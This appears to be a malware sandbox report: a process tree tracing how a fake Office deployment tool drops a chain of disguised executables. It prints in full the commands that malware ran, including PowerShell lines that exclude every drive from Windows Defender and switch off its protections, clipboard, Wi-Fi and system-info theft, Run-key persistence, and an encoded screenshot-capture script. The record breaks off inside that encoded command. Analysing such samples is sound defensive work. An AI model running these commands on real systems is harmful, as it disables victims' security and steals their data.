3568 hacn.exe 96 PID 3568 wrote to memory of 1248 3568 hacn.exe 96 PID 5036 wrote to memory of 1596 5036 based.exe 99 PID 5036 wrote to memory of 1596 5036 based.exe 99 PID 5036 wrote to memory of 1668 5036 based.exe 100 PID 5036 wrote to memory of 1668 5036 based.exe 100 PID 5036 wrote to memory of 4320 5036 based.exe 103 PID 5036 wrote to memory of 4320 5036 based.exe 103 PID 5036 wrote to memory of 680 5036 based.exe 104 PID 5036 wrote to memory of 680 5036 based.exe 104 PID 3588 wrote to memory of 2244 3588 Runtime Broker.exe 107 PID 3588 wrote to memory of 2244 3588 Runtime Broker.exe 107 PID 3588 wrote to memory of 2244 3588 Runtime Broker.exe 107 PID 1596 wrote to memory of 4868 1596 cmd.exe 109 PID 1596 wrote to memory of 4868 1596 cmd.exe 109 PID 4320 wrote to memory of 1044 4320 cmd.exe 108 PID 4320 wrote to memory of 1044 4320 cmd.exe 108 PID 5036 wrote to memory of 4704 5036 based.exe 110 PID 5036 wrote to memory of 4704 5036 based.exe 110 PID 1668 wrote to memory of 1396 1668 cmd.exe 111 PID 1668 wrote to memory of 1396 1668 cmd.exe 111 PID 5036 wrote to memory of 816 5036 based.exe 113 PID 5036 wrote to memory of 816 5036 based.exe 113 PID 5036 wrote to memory of 4360 5036 based.exe 115 PID 5036 wrote to memory of 4360 5036 based.exe 115 PID 5036 wrote to memory of 2292 5036 based.exe 117 PID 5036 wrote to memory of 2292 5036 based.exe 117 PID 5036 wrote to memory of 4616 5036 based.exe 118 PID 5036 wrote to memory of 4616 5036 based.exe 118 PID 5036 wrote to memory of 2960 5036 based.exe 122 PID 5036 wrote to memory of 2960 5036 based.exe 122 PID 5036 wrote to memory of 4940 5036 based.exe 120 PID 5036 wrote to memory of 4940 5036 based.exe 120 PID 680 wrote to memory of 2036 680 cmd.exe 119 PID 680 wrote to memory of 2036 680 cmd.exe 119 PID 816 wrote to memory of 5376 816 cmd.exe 126 PID 816 wrote to memory of 5376 816 cmd.exe 126 PID 4704 wrote to memory of 5388 4704 cmd.exe 127 PID 4704 wrote to memory of 5388 4704 cmd.exe 127 PID 4360 wrote to memory of 5380 4360 cmd.exe 128 PID 4360 wrote to memory of 5380 4360 cmd.exe 128 PID 2292 wrote to memory of 5448 2292 cmd.exe 129 PID 2292 wrote to memory of 5448 2292 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1020
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1172
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2892
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵
- Executes dropped EXE
PID:7632
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:5428
-
-
C:\Program Files\Google\Chrome\update.exe"C:\Program Files\Google\Chrome\update.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:5340
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵PID:8812
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1416
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2596
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1976
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2160
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2716
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2780
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3440
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\officedeploymenttool_18227-20162.exe"C:\Users\Admin\AppData\Local\Temp\officedeploymenttool_18227-20162.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\_MEI43322\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI43322\Build.exe -pbeznogym5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:264 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"8⤵PID:1248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd /c start "" "C:\ProgramData\GBMkiJyo.exe""8⤵PID:8704
-
C:\Windows\system32\cmd.execmd /c start "" "C:\ProgramData\GBMkiJyo.exe"9⤵PID:8748
-
C:\ProgramData\GBMkiJyo.exe"C:\ProgramData\GBMkiJyo.exe"10⤵
- Executes dropped EXE
PID:8764 -
C:\ProgramData\GBMkiJyo.exe"C:\ProgramData\GBMkiJyo.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\_MEI87642\s.exeC:\Users\Admin\AppData\Local\Temp\_MEI87642\s.exe -pbeznogym12⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2084 -
C:\ProgramData\CompPkgSrv.exe"C:\ProgramData\CompPkgSrv.exe"13⤵
- Executes dropped EXE
PID:4448 -
C:\ProgramData\CompPkgSrv.exe"C:\ProgramData\CompPkgSrv.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
PID:4344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"15⤵PID:6352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get UUID"15⤵PID:6572
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get UUID16⤵PID:1312
-
-
-
C:\Windows\SYSTEM32\reg.exereg query HKLM\SYSTEM\ControlSet001\Enum\USBSTOR15⤵
- Modifies registry key
PID:6784
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_videocontroller get caption15⤵PID:5484
-
-
-
-
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"13⤵
- Executes dropped EXE
PID:5080 -
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"14⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
PID:6332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"15⤵PID:4732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get UUID"15⤵PID:7052
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get UUID16⤵PID:4236
-
-
-
C:\Windows\SYSTEM32\reg.exereg query HKLM\SYSTEM\ControlSet001\Enum\USBSTOR15⤵
- Modifies registry key
PID:7060
-
-
-
-
C:\ProgramData\crss.exe"C:\ProgramData\crss.exe"13⤵
- Executes dropped EXE
PID:4864 -
C:\ProgramData\crss.exe"C:\ProgramData\crss.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:5736
-
-
-
C:\ProgramData\setup.exe"C:\ProgramData\setup.exe"13⤵
- Executes dropped EXE
PID:4872 -
C:\ProgramData\setup.exe"C:\ProgramData\setup.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)"15⤵
- Command and Scripting Interpreter: PowerShell
PID:6196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f"15⤵
- Command and Scripting Interpreter: PowerShell
PID:5552 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f16⤵PID:6816
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "foreach ($driveLetter in 'C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') { Add-MpPreference -ExclusionPath ${driveLetter}:\ -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess ${driveLetter}:\* -ErrorAction SilentlyContinue }"15⤵
- Command and Scripting Interpreter: PowerShell
PID:6752 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:5788
-
-
-
-
-
C:\ProgramData\setup0.exe"C:\ProgramData\setup0.exe"13⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:5700
-
-
C:\ProgramData\setup1.exe"C:\ProgramData\setup1.exe"13⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:6088
-
-
-
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"8⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"8⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"8⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"8⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard9⤵
- Clipboard Data
- Suspicious use of AdjustPrivilegeToken
PID:5376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\tree.comtree /A /F9⤵PID:5448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"8⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4616 -
C:\Windows\system32\netsh.exenetsh wlan show profile9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"8⤵PID:4940
-
C:\Windows\system32\systeminfo.exesysteminfo9⤵
- Gathers system information
PID:5572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="8⤵PID:2960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBw